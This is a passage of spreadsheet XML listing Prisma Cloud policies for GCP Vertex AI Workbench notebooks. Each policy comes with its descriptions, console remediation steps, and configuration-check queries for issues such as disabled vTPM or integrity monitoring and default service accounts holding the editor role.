      <c r="H30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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3000" t="inlineStr">
        <is>
          <t>gcloud-vertex</t>
        </is>
      </c>
      <c r="K3000" t="inlineStr">
        <is>
          <t>Tag Rehan : GCP Vertex AI Workbench user-managed notebook's JupyterLab interface access mode is set to single user</t>
        </is>
      </c>
      <c r="L3000" t="inlineStr"/>
      <c r="M3000" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3000" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3000" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3000" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3000" t="inlineStr">
        <is>
          <t>Artificial &amp; Autonomous Technologies</t>
        </is>
      </c>
      <c r="R3000" t="inlineStr">
        <is>
          <t>AAT-08:Assigned Responsibilities for AI &amp; Autonomous Technologies</t>
        </is>
      </c>
      <c r="S3000" t="inlineStr"/>
      <c r="T3000" t="b">
        <v>0</v>
      </c>
      <c r="U3000" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3000" t="inlineStr">
        <is>
          <t>gcloud-vertex-ai-notebook-instance</t>
        </is>
      </c>
      <c r="W3000" t="inlineStr">
        <is>
          <t>This policy identifies GCP Vertex AI Workbench user-managed notebooks with JupyterLab interface access mode set to single user.
Vertex AI Workbench user-managed notebook can be accessed using the web-based JupyterLab interface. Access mode controls the control access to this interface. Allowing access to only a single user could limit collaboration, increase chances of credential sharing, and hinder security audits and reviews of the resource.
It is recommended to avoid single user access and make use of the service account access mode for user-managed notebooks.</t>
        </is>
      </c>
      <c r="X3000" t="inlineStr">
        <is>
          <t>Access mode cannot be changed for existing Vertex AI Workbench user-managed notebooks. A new Vertex AI Workbench user-managed notebook should be created.
To create a new Vertex AI Workbench user-managed notebook with access mode set to service account, please refer to the steps below:
1. Login to the GCP console
2. Under 'Vertex AI', navigate to the 'Workbench' (Left Panel)
3. Select 'USER-MANAGED NOTEBOOKS' tab
4. Click 'CREATE NEW'
5. Click 'ADVANCED OPTIONS'
6. Configure the instance as required
7. Go to 'IAM and security' tab
8. Select 'Service account'
9. Click 'CREATE'</t>
        </is>
      </c>
      <c r="Y3000" t="inlineStr"/>
      <c r="Z3000" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-vertex-ai-notebook-instance' AND json.rule = state equals "ACTIVE" and ( metadata.proxy-mode equals "mail" or metadata.proxy-user-mail exists )</t>
        </is>
      </c>
      <c r="AA3000" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3000" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3000" t="inlineStr"/>
      <c r="AD3000" t="b">
        <v>0</v>
      </c>
      <c r="AE3000" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3000" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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0" t="inlineStr">
        <is>
          <t>748ce731-0cc6-4ac7-8bee-434b6e77cc9c</t>
        </is>
      </c>
      <c r="AI3000" t="inlineStr">
        <is>
          <t>b4261a97-bff3-4664-b4b7-4431d1ec917e</t>
        </is>
      </c>
      <c r="AJ3000" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3000" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3001">
      <c r="A3001" t="inlineStr">
        <is>
          <t>ITSG-33, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, TX-RAMP Level 2, ITSG-33, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1, NIST 800-53 Rev 5, ITSG-33, TX-RAMP Level 1, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, CSA CCM v4.0.12, TX-RAMP Level 2</t>
        </is>
      </c>
      <c r="B3001" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3001" s="2" t="inlineStr"/>
      <c r="D3001" t="inlineStr"/>
      <c r="E3001" t="inlineStr"/>
      <c r="F3001" t="inlineStr"/>
      <c r="G3001" t="b">
        <v>1</v>
      </c>
      <c r="H30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01" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3001" t="inlineStr">
        <is>
          <t>gcloud-vertex</t>
        </is>
      </c>
      <c r="K3001" t="inlineStr">
        <is>
          <t>GCP Vertex AI Workbench user-managed notebook has Integrity monitoring disabled</t>
        </is>
      </c>
      <c r="L3001" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M3001" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3001" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3001" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3001" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3001" t="inlineStr">
        <is>
          <t>IR</t>
        </is>
      </c>
      <c r="R3001" t="inlineStr">
        <is>
          <t>IR-05-00 : Incident Monitoring</t>
        </is>
      </c>
      <c r="S3001" t="inlineStr"/>
      <c r="T3001" t="b">
        <v>0</v>
      </c>
      <c r="U3001" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3001" t="inlineStr">
        <is>
          <t>gcloud-vertex-ai-notebook-instance</t>
        </is>
      </c>
      <c r="W3001" t="inlineStr">
        <is>
          <t>This policy identifies GCP Vertex AI Workbench user-managed notebooks that have Integrity monitoring disabled.
Integrity Monitoring continuously monitors the boot integrity, kernel integrity, and persistent data integrity of the underlying VM of the shielded user-managed notebooks. It detects unauthorized modifications or tampering, enhancing security by verifying the trusted state of VM components throughout their lifecycle. It provides active alerting allowing administrators to respond to integrity failures and prevent compromised nodes from being deployed into the cluster.
It is recommended to enable integrity monitoring for user-managed notebooks to detect and mitigate advanced threats like rootkits and bootkit malware.</t>
        </is>
      </c>
      <c r="X3001" t="inlineStr">
        <is>
          <t>1. Login to the GCP console
2. Navigate to the 'Vertex AI' service (Left Panel)
3. Under 'Notebooks', go to 'Workbench'
4. Open the 'USER-MANAGED NOTEBOOKS' tab
5. Click on the alerting notebook
6. Under the 'SYSTEM' tab, in front of 'VM details', click on the 'View in Compute Engine' link
7. Stop the VM by clicking on the 'STOP' button. Click the 'STOP' button on the confirmation dialogue.
8. Once the the VM has been stopped, click on the 'EDIT' button
9. Under 'Shielded VM', enable 'Turn on vTPM'
10. Enable 'Turn on Integrity Monitoring'
11. Click on 'Save'
12. Click on 'START/RESUME' from the top menu</t>
        </is>
      </c>
      <c r="Y3001" t="inlineStr"/>
      <c r="Z3001" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-vertex-ai-notebook-instance' AND json.rule = state equals "ACTIVE" and shieldedInstanceConfig.enableIntegrityMonitoring is false</t>
        </is>
      </c>
      <c r="AA3001" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3001" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3001" t="inlineStr">
        <is>
          <t>PC-GCP-GVA-1170</t>
        </is>
      </c>
      <c r="AD3001" t="b">
        <v>1</v>
      </c>
      <c r="AE3001" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3001" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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01" t="inlineStr">
        <is>
          <t>32863163-9440-4b46-9c61-613cb2a2da5e</t>
        </is>
      </c>
      <c r="AI3001" t="inlineStr">
        <is>
          <t>2e0650dd-63e5-4e5a-9fb9-1a4cca316fd6</t>
        </is>
      </c>
      <c r="AJ3001" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3001" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3002">
      <c r="A3002" t="inlineStr">
        <is>
          <t>Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B3002" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3002" s="2" t="inlineStr"/>
      <c r="D3002" t="inlineStr"/>
      <c r="E3002" t="inlineStr"/>
      <c r="F3002" t="inlineStr"/>
      <c r="G3002" t="b">
        <v>1</v>
      </c>
      <c r="H30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02" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3002" t="inlineStr">
        <is>
          <t>gcloud-vertex</t>
        </is>
      </c>
      <c r="K3002" t="inlineStr">
        <is>
          <t>GCP Vertex AI Workbench user-managed notebook's JupyterLab interface access mode is set to single user</t>
        </is>
      </c>
      <c r="L3002" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M3002" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3002" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3002" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3002" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3002" t="inlineStr">
        <is>
          <t>Artificial &amp; Autonomous Technologies</t>
        </is>
      </c>
      <c r="R3002" t="inlineStr">
        <is>
          <t>AAT-08:Assigned Responsibilities for AI &amp; Autonomous Technologies</t>
        </is>
      </c>
      <c r="S3002" t="inlineStr">
        <is>
          <t>Rehan</t>
        </is>
      </c>
      <c r="T3002" t="b">
        <v>0</v>
      </c>
      <c r="U3002" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3002" t="inlineStr">
        <is>
          <t>gcloud-vertex-ai-notebook-instance</t>
        </is>
      </c>
      <c r="W3002" t="inlineStr">
        <is>
          <t>This policy identifies GCP Vertex AI Workbench user-managed notebooks with JupyterLab interface access mode set to single user.
Vertex AI Workbench user-managed notebook can be accessed using the web-based JupyterLab interface. Access mode controls the control access to this interface. Allowing access to only a single user could limit collaboration, increase chances of credential sharing, and hinder security audits and reviews of the resource.
It is recommended to avoid single user access and make use of the service account access mode for user-managed notebooks.</t>
        </is>
      </c>
      <c r="X3002" t="inlineStr">
        <is>
          <t>Access mode cannot be changed for existing Vertex AI Workbench user-managed notebooks. A new Vertex AI Workbench user-managed notebook should be created.
To create a new Vertex AI Workbench user-managed notebook with access mode set to service account, please refer to the steps below:
1. Login to the GCP console
2. Under 'Vertex AI', navigate to the 'Workbench' (Left Panel)
3. Select 'USER-MANAGED NOTEBOOKS' tab
4. Click 'CREATE NEW'
5. Click 'ADVANCED OPTIONS'
6. Configure the instance as required
7. Go to 'IAM and security' tab
8. Select 'Service account'
9. Click 'CREATE'</t>
        </is>
      </c>
      <c r="Y3002" t="inlineStr"/>
      <c r="Z3002" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-vertex-ai-notebook-instance' AND json.rule = state equals "ACTIVE" and ( metadata.proxy-mode equals "mail" or metadata.proxy-user-mail exists )</t>
        </is>
      </c>
      <c r="AA3002" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3002" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3002" t="inlineStr">
        <is>
          <t>PC-GCP-GVA-1169</t>
        </is>
      </c>
      <c r="AD3002" t="b">
        <v>1</v>
      </c>
      <c r="AE3002" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3002" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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02" t="inlineStr">
        <is>
          <t>15b569e1-66bc-4c52-8c92-3e3326ff1e86</t>
        </is>
      </c>
      <c r="AI3002" t="inlineStr">
        <is>
          <t>b4261a97-bff3-4664-b4b7-4431d1ec917e</t>
        </is>
      </c>
      <c r="AJ3002" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3002" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3003">
      <c r="A3003" t="inlineStr">
        <is>
          <t>HIPAA, CIS Controls v8.1, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, ITSG-33, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, SOC 2, CIS Controls v8.1, ISO/IEC 27001:2022, NIST 800-53 Rev 5, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise</t>
        </is>
      </c>
      <c r="B3003" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3003" s="2" t="inlineStr"/>
      <c r="D3003" t="inlineStr"/>
      <c r="E3003" t="inlineStr"/>
      <c r="F3003" t="inlineStr"/>
      <c r="G3003" t="b">
        <v>1</v>
      </c>
      <c r="H30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03" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3003" t="inlineStr">
        <is>
          <t>gcloud-vertex</t>
        </is>
      </c>
      <c r="K3003" t="inlineStr">
        <is>
          <t>GCP Vertex AI Workbench user-managed notebook is using default service account with the editor role</t>
        </is>
      </c>
      <c r="L3003" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M3003" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3003" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3003" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3003" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3003" t="inlineStr">
        <is>
          <t>TA0005</t>
        </is>
      </c>
      <c r="R3003" t="inlineStr">
        <is>
          <t>T1548.005 - Temporary Elevated Cloud Access (TA0005)</t>
        </is>
      </c>
      <c r="S3003" t="inlineStr"/>
      <c r="T3003" t="b">
        <v>0</v>
      </c>
      <c r="U3003" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3003" t="inlineStr">
        <is>
          <t>gcloud-vertex-ai-notebook-instance</t>
        </is>
      </c>
      <c r="W3003" t="inlineStr">
        <is>
          <t>This policy identifies GCP Vertex AI Workbench user-managed notebooks that are using the default service account with the editor role.
When you create a new Vertex AI Workbench user-managed notebook, the compute engine default service account is associated with the notebook by default if any other service account is not configured. The compute engine default service account is automatically created when the Compute Engine API is enabled and is granted the IAM basic Editor role if you have not disabled this behavior explicitly. These permissions can be exploited to get admin access to the GCP project.
To be compliant with the principle of least privileges and prevent potential privilege escalation, it is recommended that Vertex AI Workbench user-managed notebooks are not assigned the 'Compute Engine default service account' especially when the editor role is granted to the service account.</t>
        </is>
      </c>
      <c r="X3003" t="inlineStr">
        <is>
          <t>1. Login to the GCP console
2. Navigate to the 'Vertex AI' service (Left Panel)
3. Under 'Notebooks', go to 'Workbench'
4. Open the 'USER-MANAGED NOTEBOOKS' tab
5. Click on the alerting notebook
6. Under the 'SYSTEM' tab, in front of 'VM details', click on the 'View in Compute Engine' link
7. Stop the VM by clicking on the 'STOP' button. Click the 'STOP' button on the confirmation dialogue.
8. Once the the VM has been stopped, click on the 'EDIT' button
9. Under 'Identity and API access', use the dropdown to select a non-default service account as per needs
10. Click on 'Save'
11. Click on 'START/RESUME' from the top menu</t>
        </is>
      </c>
      <c r="Y3003" t="inlineStr"/>
      <c r="Z3003" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-vertex-ai-notebook-instance' AND json.rule = state equals "ACTIVE" and serviceAccount contains "compute@developer.gserviceaccount.com" as X; config from cloud.resource where api.name = 'gcloud-projects-get-iam-user' AND json.rule = user contains "compute@developer.gserviceaccount.com" and roles[*] contains "roles/editor" as Y; filter ' $.X.serviceAccount equals $.Y.user'; show X;</t>
        </is>
      </c>
      <c r="AA3003" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3003" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3003" t="inlineStr">
        <is>
          <t>PC-GCP-GVA-1128</t>
        </is>
      </c>
      <c r="AD3003" t="b">
        <v>1</v>
      </c>
      <c r="AE3003" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3003" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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03" t="inlineStr">
        <is>
          <t>0e1a05e8-81e0-4417-9f63-168340bbfc18</t>
        </is>
      </c>
      <c r="AI3003" t="inlineStr">
        <is>
          <t>54ef5a93-23db-4aab-b02f-b743f19c6563</t>
        </is>
      </c>
      <c r="AJ3003" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3003" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3004">
      <c r="A3004" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B3004" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3004" s="2" t="inlineStr"/>
      <c r="D3004" t="inlineStr"/>
      <c r="E3004" t="inlineStr"/>
      <c r="F3004" t="inlineStr"/>
      <c r="G3004" t="b">
        <v>1</v>
      </c>
      <c r="H30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04" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3004" t="inlineStr">
        <is>
          <t>gcloud-vertex</t>
        </is>
      </c>
      <c r="K3004" t="inlineStr">
        <is>
          <t>GCP Vertex AI Workbench user-managed notebook has vTPM disabled</t>
        </is>
      </c>
      <c r="L3004" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M3004" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3004" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3004" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3004" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3004" t="inlineStr">
        <is>
          <t>Artificial &amp; Autonomous Technologies</t>
        </is>
      </c>
      <c r="R3004" t="inlineStr">
        <is>
          <t>AAT-12.2:Data Source Integrity</t>
        </is>
      </c>
      <c r="S3004" t="inlineStr"/>
      <c r="T3004" t="b">
        <v>0</v>
      </c>
      <c r="U3004" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3004" t="inlineStr">
        <is>
          <t>gcloud-vertex-ai-notebook-instance</t>
        </is>
      </c>
      <c r="W3004" t="inlineStr">
        <is>
          <t>This policy identifies GCP Vertex AI Workbench user-managed notebooks that have Virtual Trusted Platform Module (vTPM) feature disabled. 
Virtual Trusted Platform Module (vTPM) validates guest VM pre-boot and boot integrity and offers key generation and protection. The vTPM’s root keys and the keys it generates can’t leave the vTPM, thus gaining enhanced protection from compromised operating systems or highly privileged project admins.
It is recommended to enable virtual TPM device on supported virtual machines to facilitate measured Boot and other OS security features that require a TPM.</t>
        </is>
      </c>
      <c r="X3004" t="inlineStr">
        <is>
          <t>1. Login to the GCP console
2. Navigate to the 'Vertex AI' service (Left Panel)
3. Under 'Notebooks', go to 'Workbench'
4. Open the 'USER-MANAGED NOTEBOOKS' tab
5. Click on the alerting notebook
6. Under the 'SYSTEM' tab, in front of 'VM details', click on the 'View in Compute Engine' link
7. Stop the VM by clicking on the 'STOP' button. Click the 'STOP' button on the confirmation dialogue.
8. Once the the VM has been stopped, click on the 'EDIT' button
9. Under 'Shielded VM', enable 'Turn on vTPM'
10. Click on 'Save'
11. Click on 'START/RESUME' from the top menu</t>
        </is>
      </c>
      <c r="Y3004" t="inlineStr"/>
      <c r="Z3004" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-vertex-ai-notebook-instance' AND json.rule = state equals "ACTIVE" and shieldedInstanceConfig.enableVtpm is false</t>
        </is>
      </c>
      <c r="AA3004" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3004" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3004" t="inlineStr">
        <is>
          <t>PC-GCP-GVA-1167</t>
        </is>
      </c>
      <c r="AD3004" t="b">
        <v>1</v>
      </c>
      <c r="AE3004" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3004" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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04" t="inlineStr">
        <is>
          <t>b63e36e5-576d-48e3-8b92-a325c3e89b73</t>
        </is>
      </c>
      <c r="AI3004" t="inlineStr">
        <is>
          <t>e8800ee6-ef2f-4515-a837-6333f86d50b4</t>
        </is>
      </c>
      <c r="AJ3004" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3004" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3005">
      <c r="A3005" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B3005" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3005" s="2" t="inlineStr"/>
      <c r="D3005" t="inlineStr"/>
      <c r="E3005" t="inlineStr"/>
      <c r="F3005" t="inlineStr"/>
      <c r="G3005" t="b">
        <v>1</v>
      </c>
      <c r="H30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05" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3005" t="inlineStr">
        <is>
          <t>gcloud-vertex</t>
        </is>
      </c>
      <c r="K3005" t="inlineStr">
        <is>
          <t>GCP Vertex AI Workbench user-managed notebook auto-upgrade is disabled</t>
        </is>
      </c>
      <c r="L3005" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M3005" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3005" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3005" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3005" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3005" t="inlineStr">
        <is>
          <t>Artificial &amp; Autonomous Technologies</t>
        </is>
      </c>
      <c r="R3005" t="inlineStr">
        <is>
          <t>AAT-10.14:Updating AI &amp; Autonomous Technologies</t>
        </is>
      </c>
      <c r="S3005" t="inlineStr"/>
      <c r="T3005" t="b">
        <v>0</v>
      </c>
      <c r="U3005" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3005" t="inlineStr">
        <is>
          <t>gcloud-vertex-ai-notebook-instance</t>
        </is>
      </c>
      <c r="W3005" t="inlineStr">
        <is>
          <t>This policy identifies GCP Vertex AI Workbench user-managed notebooks that have auto-upgrade disabled.
Auto-upgrading Google Cloud Vertex environments ensures timely security updates, bug fixes, and compatibility with APIs and libraries. It reduces security risks associated with outdated software, enhances stability, and enables access to new features and optimizations.
It is recommended to enable auto-upgrade to minimize maintenance overhead and mitigate security risks.</t>
        </is>
      </c>
      <c r="X3005" t="inlineStr">
        <is>
          <t>1. Login to the GCP console
2. Under 'Vertex AI', navigate to the 'Workbench' (Left Panel)
3. Select 'USER-MANAGED NOTEBOOKS' tab
4. Click on the reported notebook
5. Go to 'SYSTEM' tab
6. Enable 'Environment auto-upgrade'
7. Configure upgrade schedule as required
8. Click 'SUBMIT'</t>
        </is>
      </c>
      <c r="Y3005" t="inlineStr"/>
      <c r="Z3005" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-vertex-ai-notebook-instance' AND json.rule = state equals "ACTIVE" and metadata.notebook-upgrade-schedule does not exist</t>
        </is>
      </c>
      <c r="AA3005" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3005" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3005" t="inlineStr">
        <is>
          <t>PC-GCP-GVA-1168</t>
        </is>
      </c>
      <c r="AD3005" t="b">
        <v>1</v>
      </c>
      <c r="AE3005" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3005" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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05" t="inlineStr">
        <is>
          <t>140ec543-1dc1-45e9-8b69-00f4495ef337</t>
        </is>
      </c>
      <c r="AI3005" t="inlineStr">
        <is>
          <t>4a7f77b2-9e1a-43a4-b1a3-bf2cc375d5e6</t>
        </is>
      </c>
      <c r="AJ3005" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3005" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3006">
      <c r="A3006" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3006" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3006" s="2" t="inlineStr"/>
      <c r="D3006" t="inlineStr"/>
      <c r="E3006" t="inlineStr"/>
      <c r="F3006" t="inlineStr"/>
      <c r="G3006" t="b">
        <v>1</v>
      </c>
      <c r="H30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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3006" t="inlineStr">
        <is>
          <t>gcloud-vertex</t>
        </is>
      </c>
      <c r="K3006" t="inlineStr">
        <is>
          <t>GCP Vertex AI Workbench Instance is using default service account with the editor role</t>
        </is>
      </c>
      <c r="L3006" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M3006" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3006" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3006" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3006" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3006" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R3006" t="inlineStr">
        <is>
          <t>Access Enforcement | Role-based Access Control</t>
        </is>
      </c>
      <c r="S3006" t="inlineStr"/>
      <c r="T3006" t="b">
        <v>0</v>
      </c>
      <c r="U3006" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3006" t="inlineStr">
        <is>
          <t>gcloud-vertex-ai-workbench-instance</t>
        </is>
      </c>
      <c r="W3006" t="inlineStr">
        <is>
          <t>This policy identifies GCP Vertex AI Workbench Instances that are using the default service account with the Editor role.
The Compute Engine default service account is automatically created with an autogenerated name and email address when you enable the Compute Engine API. By default, this service account is granted the IAM basic Editor role unless you explicitly disable this behavior. If this service account is assigned to a Vertex AI Workbench instance, it may lead to potential privilege escalation.
In line with the principle of least privilege, it is recommended that Vertex AI Workbench Instances are not assigned the 'Compute Engine default service account', particularly when the Editor role is granted to the service account.</t>
        </is>
      </c>
      <c r="X3006" t="inlineStr">
        <is>
          <t>1. Login to the GCP console
2. Navigate to the 'Vertex AI' service
3. In side panel, under 'Notebooks', go to 'Workbench'
4. Under 'INSTANCES' tab, select 'VIEW' as 'INSTANCES'
5. Click on the alerting instance
6. Under the 'SYSTEM' tab, in front of 'VM details', click on the 'View in Compute Engine' link
7. Stop the VM by clicking on the 'STOP' button. Click the 'STOP' button on the confirmation dialogue.
8. Once the the VM has been stopped, click on the 'EDIT' button
9. Under 'Identity and API access', use the dropdown to select a non-default service account as per needs
10. Click on 'Save'
11. Click on 'START/RESUME' from the top menu</t>
        </is>
      </c>
      <c r="Y3006" t="inlineStr"/>
      <c r="Z3006" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-vertex-ai-workbench-instance' AND json.rule = state equals "ACTIVE" and gceSetup.serviceAccounts[*].email contains "compute@developer.gserviceaccount.com" as X; config from cloud.resource where api.name = 'gcloud-projects-get-iam-user' AND json.rule = user contains "compute@developer.gserviceaccount.com" and roles[*] contains "roles/editor" as Y; filter ' $.X.gceSetup.serviceAccounts[*].email equals $.Y.user'; show X;</t>
        </is>
      </c>
      <c r="AA3006" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3006" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3006" t="inlineStr">
        <is>
          <t>PC-GCP-GVA-1291</t>
        </is>
      </c>
      <c r="AD3006" t="b">
        <v>1</v>
      </c>
      <c r="AE3006" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3006" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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6" t="inlineStr">
